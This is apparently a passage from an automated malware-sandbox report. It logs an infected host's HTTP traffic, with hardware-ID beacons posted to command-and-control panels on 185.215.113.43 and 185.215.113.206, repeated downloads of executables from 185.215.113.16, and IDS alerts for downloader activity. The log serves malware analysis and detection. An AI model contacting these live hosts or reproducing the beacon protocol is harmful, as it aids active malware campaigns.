Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="build"tale------CBGCBKFBGIIIECAAAKFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="build"tale------KKFHJDAEHIEHJJKFBGDA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build"tale------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="build"tale------BFIDGDAKFHIEHJKFHDHD--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49760 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49993 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50006 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50008 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50044 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50094 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
